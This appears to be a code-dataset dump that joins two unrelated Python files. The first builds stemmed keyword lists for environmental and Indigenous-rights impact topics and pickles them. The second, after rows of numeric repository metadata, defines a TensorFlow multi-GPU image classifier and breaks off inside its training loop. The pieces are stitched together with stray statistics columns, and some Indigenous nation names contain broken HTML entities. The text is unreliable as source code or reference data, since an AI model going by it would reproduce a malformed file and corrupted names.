# topic; first line is the topic label.
# NOTE(review): "human receptors", "CCME Guidelines", "AER Directive 038" and
# "AUC Rule 012" each appear twice — harmless duplicates for the matcher.
Impact_to_human_health_and_viewscapes = """Human Health and Aesthetics
viewscapes
toxic
human health
nuisances
health
death
illness
disease
Aesthetics
human receptors
CCME Guidelines
AER Directive 038
AUC Rule 012
release assessment
exposure assessment
dose-response
risk characterization
mental
Social
well-being
well being
stressors
emotional
public Safety
accidents
visual
obstruction of view
view points
angle of vision
quality of life
environmental changes
adverse human health effects
human receptors
air emissions
noise emissions
effluent discharge
CCME Guidelines
AER Directive 038
AUC Rule 012
risk assessment
ambient conditions
distance to edge of right-of-way
distance to edge of row
distance to schools
susceptible groups
elderly
children
recreationalists
Indigenous Women
visual impact assessment
visually absorb
landscape features
view obstruction
Health canada
human health impact assessment
Canadian handbook on health impact assessment
health indicator data
statistics canada
mortality
beauty
odour"""
# Newline-separated keyword/phrase list for the infrastructure and services
# topic; first line is the topic label.
# NOTE(review): "Infractructure" and "ammenities" look like typos for
# "Infrastructure" / "amenities" — confirm before changing, since matching
# happens on the stemmed keyword text.
Social_cultural_economic_infrastructure_and_services = """Infrastructure and Services
Infractructure
Services
Hospital
Urgent Care
ambulance
Fire services
Fire response
protective services
police services
Emergency response time
Emergency response
Hotel
Motel
RCMP
Royal Canadian Mounted police
medical response personnel
healthcare
social services
Local commercial accommodation
local accommodation
existing accommodation
worker accommodation
campground
Recreational Camp sites
recreational Resources
camp sites
Municipal waste
Municipal wateruse
Municipal water use
waste
contingency plan
traffic control
multi-passenger vehicles
restrict access
service providers
chemical waste
solid waste
liquid waste
landfills
industrial waste
non-hazardous waste
transfer stations
hazardous waste facilities
wastewater treatment facilities
recycling facilities
highways
roads
airports
bridge
911 dispatch services
Local commercial accommodation
Camp sites
Recreational Camp sites
railway
rail
roadway
road
highway
traffic
traffic flow
traffic usage levels
traffic patterns
pipeline
water main
water supply
sewage line
waste water
waste disposal
navigable waterway
powerline
power line
existing
pre-existing
preexisting
local services
regional services
services
accommodation
camping
facilities
recreation
recreational
ammenities
community services
essential services
emergency services
health care services
social services
police
fire
fire fighting
fire-fighting
firefighting
EMT
response time
healthcare
health care
hospital
housing
educational facilities
school
university
college
transportation
access
construction access
land access
right of way
right-of-way
ROW
temporary workspace
temporary work space
TWS
sewer
disposal
electricity
traffic usage
railways
availability of housing
local residents
heavy load vehicles
construction access permits
hotel
big box stores
town centre
property
motel
construction
increased demand"""
# Newline-separated keyword/phrase list for the employment and economy topic;
# first line is the topic label.
# NOTE(review): "cotractors" looks like a typo for "contractors" — confirm
# before changing (keywords are matched after stemming).
Economic_Offsets_and_Impact = """Employment and Economy
Employment opportunities
Business opportunities
contracting opportunities
Project contracting
local contracting
subcontracting
Indigenous employment
Aboriginal employment
Aboriginal participation plan
Indigenous participation plan
Aboriginal businesses
Indigenous businesses
direct employment
prime contractor
local Business
local Economy
local economies
unemployment rate
employment rate
educational level
post-secondary
high school
high-school
college
cegep
diploma
degree
university
non-university
bachelor
certificate
Economy
wage
tips
commission
dividend
pension
child support payment
spousal support payment
jobs
monetary
salary
cash
personnel
cotractors
workers
workforce
staff
labour force
labor force
economic well-being
procurement
tax
revenue
Major industries
Primary industries
Key industrial sectors
tourism
mining
quarrying
oil and Gas
gas extraction
agriculture
forestry
fishing
hunting
construction
public administration
retail trade
temporary workforce
permanent workforce
permanent part-time Employment
permanent full-time Employment
temporary part-time Employment
temporary full-time Employment
self-employment
retirement
investment
contracting
contract
procurement
ordering
training
training programs
education
opportunity
labor
labour
development plan
labour services
economic participation
project requirements
dollar value
contract value
worker
workforce
work force
revenue
tax levee
employment
unemployment
education level
skill level
economic condition
direct revenue
indirect revenue
hardship
displacement
economic benefits plan
cooperation agreement
bid
qualification
income
compensation
partnership
collaboration
distribution
outreach
commitment
financial
benefits
monitoring
environmental monitoring certificate program"""
# Newline-separated keyword/phrase list for the Rights of Indigenous Peoples
# topic; first line is the topic label. The long tail of this list repeats
# the Indigenous nation/community names also present in the Traditional Land
# and Resource Use keyword list earlier in this module; the two copies are
# kept separate so each topic can be tuned independently.
Treaty_and_Indigenous_Rights = """Rights of Indigenous Peoples
potential rights
established rights
asserted rights
protected rights
section 35 rights
Indian Act
Constitution Act, 1982
Constitution Act
section 35
s. 35
Indigenous
Aboriginal
Native
Indian
Métis
Metis
Inuit
Inuk
Communities
Nation
Band
Tribe
Settlement
Treaty
Crown Land
Traditional Land
territory
Traditional Territory
Traditional Knowledge
IK
OIK
TK
Elder
knowledge keeper
knowledge holder
rights-bearing
engagement
Indigenous engagement
Aboriginal engagement
Crown
duty to consult
agent of the Crown
early engagement
CER Early Engagement Guide
Indigenous and Northern Affairs Canada
INAC
Crown-Indigenous Relations and Northern Affairs Canada
CIRNAC
Indigenous Services Canada
ISC
infringe
exercise rights
practice rights
customs
traditions
practices
access to lands
access to resources
travel ways
land availability
resource availability
governancy system
Reconciliation
Truth and Reconciliation
TRC
Calls to Action
missing and murdered
MMIW
MMIWG
residential school
United Nations Declaration on the Rights of Indigenous Peoples
UNDRIP
Traditional Knowledge
Hunt
fishing
Harvest
Culturally significant
Culturally modified tree
Gather
Berries
Medicine
Berry picking
Elder
Trapping
engagement
trap
Ceremony
ceremonies
Medicinal
Cultural
First Peoples
rights-bearing
reserves
first nations
shxw’ōwhámel
lheidlit’enneh
whispering pines first nation
kumik elder lodge
tribal
Abenaki
Innu
Montagnais-Naskapi
Oneida
Ahousaht
Interior Salish
Onondaga
Algonquin
Inuinnait
Copper Inuit
Pacheenaht
Assiniboine
Inuvialuit
Mackenzie Inuit
Petun
Atikamekw
Kainai
Piikani
Peigan
Baffin Island Inuit
K'asho Got'ine
Saldermiut Inuit
Beothuk
Kaska Dena
Sahtu Got'ine
Bearlake
Blackfoot Confederacy
Blackfoot
Kivallirmiut
Caribou Inuit
Secwepemc
Shuswap
Cayuga
Ktunaxa
Kootenay
Sekani
Central Coast Salish
Kwakwaka'wakw
Kwakiutl
Seneca
Coast Salish
Kyuquot and Checleseht
Shuta Got'ine
Cree
Labradormiut
Labrador Inuit
Siksika
Dakota
Lilwat
Lillooet
Slavey
Dakelh
Lingit
Tlingit
Stoney-Nakoda
Dane-zaa
Beaver
Syilx
Okanagan
Dene
Mi'kmaq
Tagish
Denesuline
Chipewyan
Mohawk
Tahltan
Ditidaht
Mowachaht-Muchalaht
Tla-o-qui-aht
Clayoquot
Ehattesaht
Nahani
Tlicho
Dogrib
Gitxsan
Gitksan
Netsilingmiut
Netsilik Inuit
Toquaht
Gwich'in
Neutral Confederacy
Tr'ondëk Hwëch'in (Han)
Haida
Nicola-Similkameen
Tseshaht
Sheshaht
Haisla
Kitamaat
Nisga'a
Tsilhqot'in
Chilcotin
Haudenosaunee
Six Nations
Iroquois
Nlaka'pamux
Thompson
Tsimshian
Heiltsuk
Northern Georgia Strait Coast Salish
Tsuut'ina
Sarcee
Hesquiaht
Nuchatlaht
Tutchone
Hupacasath
Opetchesaht
Nunavimmiut
Ungava Inuit
Uchucklesaht
Huu-ay-aht
Nuu-chah-nulth
Ucluelet
Huron-Wendat
Nuxalk
Bella Coola
Wolastoqiyik
Maliseet
Iglulingmuit
Iglulik Inuit
Odawa
Wetal
Tsetsaut
Ojibwa
Yellowknives
popkum first nation
leq’á:mel first nation
alexander first nation
samson cree first nation
o’chiese first nation
ermineskin cree nation
enoch cree nation
eskimo
?Akisq'nuk
?Esdilagh
'Namgis
Aamjiwnaang
Fort Liard
Adams Lake
Ahousaht
Ahtahkakoop
&Abrevethélets
Aklavik
Tobacco Plains
Ahkwesáhsne Kanien'kehá:ka
Alderville
Alexander
Alexis Nakota Sioux
Tsi Del Del
Alkali Lake
Anaham
Anderson Lake
Animbiigoo Zaagi'igan Anishinaabek
Big Island
Anishinabe of Wauzhushk Onigum
St. Mary's
Ikpiarjuk
Tsiigehtchic
Aseniwuche Winewak
Ashcroft
Athabasca Chipewyan
Whitefish Lake
Attawapiskat
Aundeck-Omni-Kaning
Grise Fiord
Awaetlala
Peerless Trout
Barren Lands
Batchewana
Beardy's and Okemasis'
Bearskin Lake
Beausoleil
Beaver
Beaver Lake
Scia'new
Fort Norman
Behdzi Ahda"
Heíltsuk
Nuxalk
Big Cove
Joseph Bighead Cree
Big River
Bigstone Cree
Birch Narrows
Birdtail Sioux
Walpole Island
Stony Rapids
Little Black River
Marcel Colomb
Blood
Bloodvein
Blueberry River
Montana Cree
St'uxtews
Boothroyd
Boston Bar
Bridge River
Brokenhead Ojibway
Wet'suwet'en
Qikiqtarjuaq
Brunwick House
Tjipogtotjg
Buffalo Point
Buffalo River Dene
Oxford House
Burns Lake
Burnt Church
Tsleil Waututh
Calling Lake
Cambridge Bay
Wei Wai Kum
Stswecem'c/Xgat'tem
Canoe Lake Cree
Canupawakpa Dakota
Kinngait
Cape Mudge
Carcross/Tagish
Ceg-a-Kin
Cayoose Creek
Ch'iyáqtel
Chacachas
Chakastaypasin
Seton Lake
Champagne and Aishihik
Chawathil
Cheam
Chehalis
Chemainus
Chemawawin Cree
Cheslatta Carrier
Big Bear
Janvier
Chisasibi
Tla-o-qui-aht
Clearwater River Dene
Clyde River
Cold Lake
Coldwater
Comox
Constance Lake
Cook's Ferry
Cote
Cowessess
Cowichan
O-Chi-Chak-Ko-Sipi
Mikisew Cree
Cross Lake
Cumberland House
Dakota Plains Wahpeton
Dakota Tipi
Dauphin River
Day Star
Daylu Dena Council
Skeetchestn
Dease River
Dechi Laot'i
Deh Gah Gotie Dene
Fort Franklin
Dene Tha'
Fort Resolution
Nitinaht
Tli Cho
Doig River
Douglas
Driftpile
Duncan's
Dzawada'enuxw
Ebb and Flow
Natoaganeg
Ehattesaht
Kesyehot'ine
Enoch
Ermineskin Cree
Esdilah
Esquimalt
Fairford
Fisher River Cree
Fishing lake
Flying Dust
Fond du Lac Denesuline
Fort Churchill
Fort Folly
Fort Good Hope
Fort Albany
Fort Alexander
Smith's Landing
Fort George
Fort MacKay
Fort McMurray
Fort McPherson
Fort Nelson
Fort Rupert Band
Liidlii Kue
Fort Smith
Fort Ware
Xaxl'ip
Fox Lake Cree
Nadleh Whut'en
Frog Lake
Gamblers
Rae Lakes
Garden Hill
Gesgapegiag
Gingolx
Gitanmaax
Kitwancool
Gitg'a'ata
Kitkatla
New Aiyansh
Gitsegukla
Kitselas
Gitwangak
Gitwinksihlkw
Gitxsan
Glen Vowell
God's Lake
Manto Sipi
George Gordon
Grand Rapids
Grouard
Gwa'Sala-Nakwaxda'xw
Gwawaenuk
Hagwilget
Haisla
Halalt
Halfway River
Hatchet Lake
Hay River
Heart Lake
Hesquiaht
Tenlenaitmux
Wanipigow
Holman
Homalco
Horse Lake
Hupacasath
Huu-ay-aht
Iglulik
Indian Birch
Indian Island
Inuvik
Iqaluit
Iskut
Ministikwan
Kinonjeoshtegon
James Smith
Jean Marie River
Muskoday
K'ómoks
Ka'a'gee Tu
Ka:'yu:'k't'h'/Che:k:tles7et'h'
Kahkewistahaw
Kahnawà:ke
Kamloops
Kanaka Bar
Kanehsatà:ke
Rankin Inlet
Kaska Nation
Katzie
Poor Man or Lean Man
Keeseekoose
Riding Mountain Band
Kehewin Cree
Kelly Lake
Kelly Lake Cree
Kelly Lake Métis Settlement
Lake Harbour
Kinistin
Kispiox
Kitasoo/Xai'Xais
Kitsumkalum
Klahoose
Kluane
Kluskus
Kwanlin Dun
Kwantlen
Kwaw-Kwaw-Apilt
Kwiakah
Kwicksutaineuk-ah-kwaw-ah-mish
Kwikwetlem
Lac La Martre
Lac La Ronge
Leq'á:mel
Lakalzap
Lake Babine
Lake Cowichan
Lake Manitoba
Lake St. Martin
Lax-Kw'alaams
Lean Man
Lekwungen
Lhtakot'en
Liard
Mount Currie
T'it'q'et
Restigouche
Little Black Bear
Little Grand Rapids
Little Pine
Little Red River Cree
Little Salmon Carmacks
Little Saskatchewan
Skwlax
Long Plain
Loon River
Louis Bull
Yaqan Nukiy
Lower Nicola
Lower Similkameen
Lubicon Lake
Lucky Man
Snowdrift
Lyackson
Lytton
Madawaska Maliseet
Makwa Sahgaiehcan
Malahat
Maliseet
Mamalilikulla-Qwe'Qwa'Sot'Em
Manawan
Mathias Colomb
Matsqui
McLeod Lake
Metlakatla
Miawpukek Mi'kamawey Mawi'omi
La Nation Micmac de Gespeg
Mistawasis
Mittimatalik
Mississaugas of the New Credit
Kenhtë:ke Kanyen'keh·:ka
Montreal Lake Cree
Moose Lake
Moosomin
Moricetown
Mosquito, Grizzly Bear's Head, Lean Man
Mowachaht/Muchalaht
Muscowpetung
Utshimassit
Muskeg Lake
Muskowekwan
Musqueam
N'ahadehe
Na-Cho Nyak Dun
Nak'azdli
Nanoose
Nazko
Nee Tahi Buhn
Nekaneet
Xeni Gwet'in
Nisichawayasihk
Neskonlith
Nicomen
Nisga'a Nation
Nooaitch
Northlands Denesuline
Northwest Angle No. 33
Northwest Angle 37
Simpcw
Norway House
Nuchatlaht
Nunavut
Nuwitti
Nut Lake
Oak Lake
O'Chiese
Sioux Valley Dakota
Ocean Man
Ochapowace
Opitciwan
Odanak
Ohamil
Okanagan
Okanese
Old Masset Village Council
Willow Crees
Onion Lake
Opaskwayak Cree
O-Pipon-Na-Piwin Cree
Oregon Jack Creek
Oromocto
Osoyoos
Oujé Bougoumou Cree
Oweekeno
Pacheedaht
Pangnirtung
Pasqua
Pauingassi
Paul
Paulatuk
Pauquachin
Ts'kw'aylaxw
Peepeekisis
Peguis
Pehdzeh Ki
Selkirk
Peigan
Pelican Lake
Penelakut
Penticton
Peter Ballantyne
Peter Chapman
Peters
Pheasant Rump Nakota
Piapot
Algonquins of Pikwákanagán
Pine Creek
Piyesiw-awasis
Popkum
Poplar River
Poundmaker
Prophet River Band, Dene Tsaa Tse K'Nai
Qalipu Mi'Kmaq
Qausuittuq
Qayqayt
Qualicum
Quatsino
Rat Portage
Red Earth
Red Pheasant
Red Sucker Lake
Rolling River
Roseau River Anishinabe
Ross River
Sachs Harbour
Saddle Lake Cree
Saik'uz
Sakimay
Samahquam
Sambaah Ke Dene
Samson
Sandy Bay
Sapotaweyak
Saulteau
Saulteaux
Sawridge
Scowlitz
Seabird Island
Shishálh
Semiahmoo
Secwepemc
Shackan
Shamattawa
Shoal Lake
Shxwhá:y Village
Sîkîp Sâkahikan
Siksika
Sinixt
Siska
Six Nations
Skatin
Skawahlook
Skidegate
Skin Tyee
Skulkayn
Skownan
Skuppah
Skwah
Tla'Amin
Snuneymuxw
Soda Creek
Soowahlie
Splatsin
Tataskweyak Cree
Spuzzum
Squamish
Squiala
St. Theresa Point
Standing Buffalo Dakota
Star Blanket
Stellat'en
Yunesit'in
Stoney Nakoda
Stony Knoll
Sturgeon Lake
Sturgeon Lake Cree
Sucker Creek, AB
Sucker Creek, ON
T'exelc
Semá:th
Sunchild
Swan Lake
Swan River
Sweetgrass
Ta'an Kwäch'än
Tahltan
Takla Lake
Taku River Tlingit
Tallcree
Teetl'itzheh
Teslin Tlingit
The Key
Tl'azt'en
Tl'esqox
Tli Cho Government
Turner Island
Tobique
Valley River
Toquaht
T'Sou-ke
Tr'on dëk Hwëch'in
Ts'ueh Nda
Tsartlip
Tsawout
Tsawwassen
Tsay Keh Dene
Tseshaht
Tseycum
Tsuu T'ina
Tuktoyaktuk
Uchucklesaht
Ucluelet
Ulkatcho
Union Bar
Upper Nicola
Upper Similkameen
Vuntut Gwitchin
Wahpeton Dakota
War Lake
Wasagamack
Waswanipi Cree
Waywayseecappo
Wemotaci
Nation Huronne Wendat
Westbank
West Moberly
Wet'suwet'en Nation
Whispering Pines/Clinton
White Bear
White River
Whitecap Dakota
Atikameg
Witchekan Lake
Wolastokwik NeGoot-Gook
Wôlinak
Wood Mountain Lakota
Woodland Cree
Wrigley
Yeqwyeqwí:ws
Yale
Yekooche
Yellowknives Dene
York Factory
Columbia Lake
Alexandria
Chippewas of Sarnia
Acho Dene Koe
Sexqeltqin
Aitchelitz
Akun'kunik'
Akwesasne
Redstone Band
Esketemc
Tl'etinqox-t'in
N'quatqua
Lake Nipigon Ojibway
Anishinaabeg of Naongashiing
Aqam
Arctic Bay
Arctic Red River
Grande Cache
Atikameksheng Anishnawbek
Sucker Creek
Ausuittuq
Da'naxda'xw
Bald Hill
Beardy's and Okemasis
Beaver Lake Cree
Beecher Bay
Tulita Dene
Bella Bella
Bella Coola
Elsipogtog
Naongashiing
Big Island Lake
Turnor Lake
Bkejwanong
Black Lake Denesuliné
Makadewaagamijiwanong
Black Sturgeon
Kainai
Bobtail
Bonaparte
Nxwisten
Broman Lake
Broughton Island
Buctouche
Bunibonibee
Ts'il kaz koh
Esgenoopetitj
Burrard
Jean Baptiste Gambler
Ikaluktutiak
Campbell River
Canoe Creek
Cape Dorset
We Wai Kai
Carry the Kettle Nakota
Sekw'el'was
Ch'yaqtel
Tsal'alh
Chi:yo:m
Sts'Ailes
Stz'uminus
Chemawawin
Chief Big Bear
Chipewyan Prairie
Clayoquot
Kangiqtugaapik
Crane River
Cree Chip
Pimicikamak
Waskahikanihk Cree Cree
Lower Post
Deadman's Creek
Wekwèti
Fort Providence
Déline
Deninu K'ue
Ditidaht
Dog Rib Rae
Xa'xtsa
Tsawataineuk
Eel Ground
English River
Ermineskin
Pinaymootang
Fisher River
Sayisi Dene
K'asho Got'ine
Sagkeeng
Fort Fitzgerald Dene
Lheidli T'enneh
Kwawkewlth
Fort Simpson
Salt River 195
Kwadacha
Fountain
Fox Lake
Fraser Lake
Gamèti
Gitanyow
Hartley Bay
Gitkxaala
Gitlakdamix
Gits'ilaasu
God's Lake Narrows
Manto Sipi Cree
Goodfish
Misipawistik Cree
Kapawe'no
Kitamaat
K'atlodeeche
High Bar
Hollow Water
Uluqsaqtuuq
Xwémalhkwu
Ohiaht
Wuskwi Sipihk
Island Lake
Jackhead
Tthe'k'ehdeli
John Smith
Comoks
Kakisa
Kyuquot
Tk'emlúps
Kangiqliniq
Kawacatoose
Keeseekoowenin
Kimmirut
Lhoosk'uz Dene
Kwikwasut'inuxw Haxwa'mis
Wha Ti
Lakahahmen
Laxgalt'Sap
Nat'oot'en
Lapatack Cree
Kawacatoose or Mosquito, Grizzly Bear's Head, Lean Man
Songhees
Red Bluff
Lil'wat
Lillooet
Listuguj
Little Shuswap Lake
Lower Kootenay
Lù'an Män Ku Dän
Lutsel K'e Dene
Maliseet of Viger
Manouane
Mathias Colomb Cree
Tsek'hene
Purtujuq
Mohawks of the Bay of Quinte
Montreal Lake
Mosakahiken
Witset
Mushuau Innu
Petequakey
Nahanni Butte
Nak'azdli Whut'en
Snaw-naw-as
Nemaiah
Nelson House
Northlands
Northwest Angle 33
Northwest Angle No. 37
North Thompson
Norway House Cree
Tlatlasikwala
Yellow Quill
Oak River
Obedjiwan
Shxw'ow'hamel
One Arrow
The Pas
O-Pipon-Na-Piwin
Oujé Bougoumou
Wuikinuvx
Pacheenaht
Panniqtuuq
Pavillion
Pelly Band
Piikani
Peter Ballantyne Cree
Skw'atels
Golden Lake
Thunderchild
Poor Man
Prophet River
Resolute Bay
Onihcikiskowapowin
Stony Creek
Zagime Anishinabek
Trout Lake
White Mud River
Sapotaweyak Cree
Sq'éwlets
Sechelt
Waterhen Lake
Sq'ewá:lxw
Sq'ewq&emacryl
Water Hen
Sliammon
Xatsu'll/Cm'etem
Spallumcheen
Tataskweyak
Stone
Young Chipeeweyan
Sukwekwin
Sumas
Tetlit Gwich'in
Toosey
Tlowitsis-mumtagila
Tootinaowaziibeeng
T'Souke
West Point
Tyendinaga
Weymontachi
Whitefish
Yakweakwioose
Akisq'nuk
Alexis Creek
Gwichya Gwich'in
Atikameksheng Anishnawbek
Tanakteuk
Kapuskwatinak
Begaee Shuhagot'ine
Black River
Xwísten
Tzeachten
Chalath
Waskahikanihk Cree
Poplar House People
Kwakiutl
God's River
Misipawistik
Ulukhaktok
Ministikwan Lake Cree
Mosquito
Pukatawagan
Pond Inlet
Mosakahiken Cree
Necoslie
Whitefish Bay
South Indian Lake
Pikwàkanagàn
Dene Tsaa Tse K'Nai
Saddle Lake
Shoal River
Skowkale
Split Lake
Williams Lake
Tlowitsis
Whitefish Lake, AB
Whitefish Lake (Atikameg)
Peerless Lake
Grizzly Bear's Head
Animakhee Wazhing
Whitefish Lake, ON"""
# Build the per-label keyword lists from the raw keyword strings defined
# earlier in the file, normalise them (lowercase, one phrase per line),
# stem each token with NLTK's Porter stemmer, and persist the result.
keywords = [Landscape_terrain_and_weather,
            Soil,
            Plants,
            Water,
            Fish,
            Wetlands,
            Wildlife,
            Species_at_Risk,
            Greenhouse_gas_emissions,
            Air_emissions,
            Noise,
            Electricity_and_electromagnetism,
            Proximity_to_people,
            Archaeological_paleontological_historical_and_culturally_significant_sites_and_resources,
            Human_access_to_boats_and_waterways,
            Indigenous_land_water_and_air_use,
            Impact_to_social_and_cultural_well_being,
            Impact_to_human_health_and_viewscapes,
            Social_cultural_economic_infrastructure_and_services,
            Economic_Offsets_and_Impact,
            Environmental_Obligations,
            Treaty_and_Indigenous_Rights]
# Each raw entry is a newline-separated block of phrases; lowercase, then
# split into one phrase per list element.
keywords = [x.lower().split("\n") for x in keywords]
stemmer = PorterStemmer()
# Hoisted out of the loops: stopwords.words("english") re-reads the corpus
# on every call, and a set gives O(1) membership tests instead of scanning
# a list for every token.
_stopword_set = set(stopwords.words("english"))
for i, label_keywords in enumerate(keywords):
    stemmed_words = []
    for word in label_keywords:
        token_words = word_tokenize(word)
        stemmed_tokens = [stemmer.stem(t) for t in token_words if t not in _stopword_set]
        stemmed_words.append(" ".join(stemmed_tokens))
    # Replace the raw phrases with their stemmed, stopword-free versions.
    keywords[i] = stemmed_words
print(keywords[0], keywords[1], keywords[2], keywords[3], keywords[4], keywords[5], keywords[6], keywords[7], keywords[8])
# Persist for later reuse (pickle format; consumers must load with the same
# list-of-lists-of-strings structure).
with open("keywords.pkl", "wb") as f:
    pickle.dump(keywords, f)
| 16.046408
| 122
| 0.863571
| 11,576
| 90,245
| 6.722357
| 0.321095
| 0.004318
| 0.002956
| 0.004318
| 0.793711
| 0.789059
| 0.784356
| 0.783482
| 0.78248
| 0.77883
| 0
| 0.00092
| 0.12096
| 90,245
| 5,624
| 123
| 16.046408
| 0.980007
| 0
| 0
| 0.798213
| 0
| 0
| 0.97406
| 0.002438
| 0
| 0
| 0
| 0
| 0.000179
| 1
| 0
| false
| 0.000536
| 0.001072
| 0
| 0.001072
| 0.000179
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
405efef856e3bfbe9876ef92fe4609e2f34c92b9
| 209,398
|
py
|
Python
|
Train/Net.py
|
shelljane/ApproxFlow
|
e24aea877ebb66a79e4deacf6d635aabb1cb6662
|
[
"MIT"
] | 2
|
2021-03-16T03:29:05.000Z
|
2021-07-28T02:05:05.000Z
|
Train/Net.py
|
FDU-ME-ARC/ApproxFlow
|
e24aea877ebb66a79e4deacf6d635aabb1cb6662
|
[
"MIT"
] | null | null | null |
Train/Net.py
|
FDU-ME-ARC/ApproxFlow
|
e24aea877ebb66a79e4deacf6d635aabb1cb6662
|
[
"MIT"
] | 1
|
2021-04-05T17:39:13.000Z
|
2021-04-05T17:39:13.000Z
|
import tensorflow as tf
import Layer
import numpy as np
from Protocol import Net
from tensorflow.python.ops.array_ops import fake_quant_with_min_max_vars
from tensorflow.python.framework import graph_util
# Number of bits used by fake_quant_with_min_max_vars when simulating
# quantization (re-exported from the Layer module so both agree).
FAKEBITS = Layer.FAKEBITS
# Noise-injection parameters for the approximate-computing simulation
# (used in Net4Approx.body): each activation is perturbed by
# PORTION * |activation| * Uniform(FROM, TO).
PORTION = 1.0
FROM = -1.0
TO = 1.0
# Default hyper-parameters shared by the Net4* classes below.
HParamDefault = {'NumGPU': 1,            # GPUs to split each batch across; 0 selects the single-device path
                 'BatchSize': 50,        # total batch size (divided evenly over NumGPU)
                 'LearningRate': 1e-3,
                 'MinLearningRate': 1e-5,
                 'WeightDecay': 1e-5,
                 'ValidateAfter': 1000,  # steps between validation runs
                 'LRDecayAfter': 10000,
                 'LRDecayRate': 0.1,
                 'TestSteps': 200,       # batches drawn per evaluation
                 'TotalSteps': 30000}
class Net4Classify(Net):
    """Image-classification network with optional multi-GPU data parallelism.

    Builds the graph at construction time: placeholders, a user-supplied
    body function producing features and layer objects, a final
    fully-connected logits layer, a cross-entropy loss, and an Adam
    optimizer.  When HParam['NumGPU'] > 0 the batch is split across GPUs
    and gradients are averaged on the CPU; otherwise a single-device
    graph is built.
    """

    def __init__(self, inputShape, numClasses, body, HParam=HParamDefault, name='Net4Classify'):
        """Construct the classification graph.

        Args:
            inputShape: per-example input shape (list), without the batch dim.
            numClasses: number of output classes.
            body: callable (self, images) -> (features, layers) building the backbone.
            HParam: hyper-parameter dict; see HParamDefault for keys.
            name: variable-scope / checkpoint name for this network.
        """
        Net.__init__(self, HParam, name)
        with self._graph.as_default(), tf.device('/cpu:0'), tf.variable_scope(self._name, reuse=tf.AUTO_REUSE):
            # Inputs
            self._images = tf.placeholder(dtype=tf.float32, shape=[self._HParam['BatchSize']]+inputShape, name='images')
            self._labels = tf.placeholder(dtype=tf.int64, shape=[self._HParam['BatchSize']], name='labels')
            self._numClasses = numClasses
            self._body = body
            self._optimizer = tf.train.AdamOptimizer(self._lr, epsilon=1e-8, use_locking=True)
            # Network
            if self._HParam['NumGPU'] > 0:
                # Data-parallel path: split the batch evenly across GPUs,
                # build one tower per GPU, then average losses/gradients.
                self._imagesGroup = tf.split(self._images, self._HParam['NumGPU'], axis=0)
                self._labelsGroup = tf.split(self._labels, self._HParam['NumGPU'], axis=0)
                self._gpuBodies = []
                self._gpuInferences = []
                self._gpuAccuracies = []
                self._gpuLosses = []
                self._gpuLayers = []
                self._lossesList = []
                for idx in range(self._HParam['NumGPU']):
                    with tf.device('/gpu:%d'%idx):
                        with tf.name_scope('GPU_%d'%idx):
                            body, layers = self.body(self._imagesGroup[idx])
                            self._gpuLayers.append(layers)
                            self._gpuBodies.append(body)
                            self._gpuInferences.append(self.inference(self._gpuBodies[idx]))
                            self._gpuAccuracies.append(tf.reduce_mean(tf.cast(tf.equal(self._gpuInferences[idx], self._labelsGroup[idx]), tf.float32)))
                            # Regularization losses from the layers plus the data loss.
                            self._gpuLosses.append(self.getLoss(layers))
                            self._gpuLosses[idx] += self.lossFunc(self._gpuBodies[idx], self._labelsGroup[idx])
                # Subclasses inspect layer objects via self._layers; tower 0
                # is representative since all towers share variables.
                self._layers = self._gpuLayers[0]
                self._postInit()
                for idx in range(self._HParam['NumGPU']):
                    with tf.device('/gpu:%d'%idx):
                        with tf.name_scope('GPU_%d'%idx):
                            self._lossesList.append(self._optimizer.compute_gradients(self._gpuLosses[idx], gate_gradients=0))
                # Fix: the original emitted these two concat statements twice,
                # creating redundant graph ops; build them once.
                self._body = tf.concat(self._gpuBodies, axis=0)
                self._inference = tf.concat(self._gpuInferences, axis=0)
                self._loss = tf.reduce_mean(tf.concat([tf.expand_dims(elem, axis=0) for elem in self._gpuLosses], axis=0), axis=0)
                self._accuracy = tf.reduce_mean(tf.concat([tf.expand_dims(elem, axis=0) for elem in self._gpuAccuracies], axis=0), axis=0)
                self._updateOps = []
                for idx in range(len(self._gpuLayers)):
                    self._updateOps.extend(self.getUpdateOps(self._gpuLayers[idx]))
                # Average each variable's gradient across towers before applying.
                applyList = []
                for idx in range(len(self._lossesList[0])):
                    grads = []
                    for jdx in range(len(self._lossesList)):
                        grads.append(tf.expand_dims(self._lossesList[jdx][idx][0], axis=0))
                    applyList.append((tf.reduce_mean(tf.concat(grads, axis=0), axis=0), self._lossesList[0][idx][1]))
                # NOTE: _optimizer is rebound from the optimizer object to the
                # apply-gradients train op, as in the original design.
                self._optimizer = self._optimizer.apply_gradients(applyList, global_step=self._step)
            else:
                # Single-device path.
                body, layers = self.body(self._images)
                self._body = body
                self._inference = self.inference(self._body)
                self._loss = self.getLoss(layers)
                self._accuracy = tf.reduce_mean(tf.cast(tf.equal(self._inference, self._labels), tf.float32))
                self._layers = layers
                self._updateOps = self.getUpdateOps(layers)
                self._postInit()
                applyList = self._optimizer.compute_gradients(self._loss, gate_gradients=0)
                self._optimizer = self._optimizer.apply_gradients(applyList, global_step=self._step)
            # Saver
            self._saver = tf.train.Saver(max_to_keep=5)
            # Network Graph
            # self._writer = tf.summary.FileWriter("./Tensorboard", self._sess.graph)

    def _postInit(self):
        """Hook called after the towers are built; subclasses override."""
        pass
        # tf.contrib.quantize.create_training_graph(input_graph=self._graph, quant_delay=0)
        # print(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES))

    def train(self, genTrain, genTest, pathLoad=None, pathSave=None):
        """Run the training loop.

        Args:
            genTrain: generator yielding (data, label) training batches.
            genTest: generator yielding (data, label) evaluation batches.
            pathLoad: optional checkpoint path to restore before training.
            pathSave: optional checkpoint path; saved whenever validation
                accuracy matches or beats the best seen so far.
        """
        with self._graph.as_default():
            # Initialize all
            self._sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])
            if pathLoad is not None:
                self.load(pathLoad)
            # Baseline accuracy before any training step.
            maxAccu = self.evaluate(genTest)
            self._postTrain('./NoTrainWeights')
            # self._writer.close()
            self._sess.run([self._phaseTrain])
            for _ in range(self._HParam['TotalSteps']):
                data, label = next(genTrain)
                loss, accu, step, _ = self._sess.run([self._loss, self._accuracy, self._step, self._optimizer], \
                                                     feed_dict={self._images: data, self._labels: label})
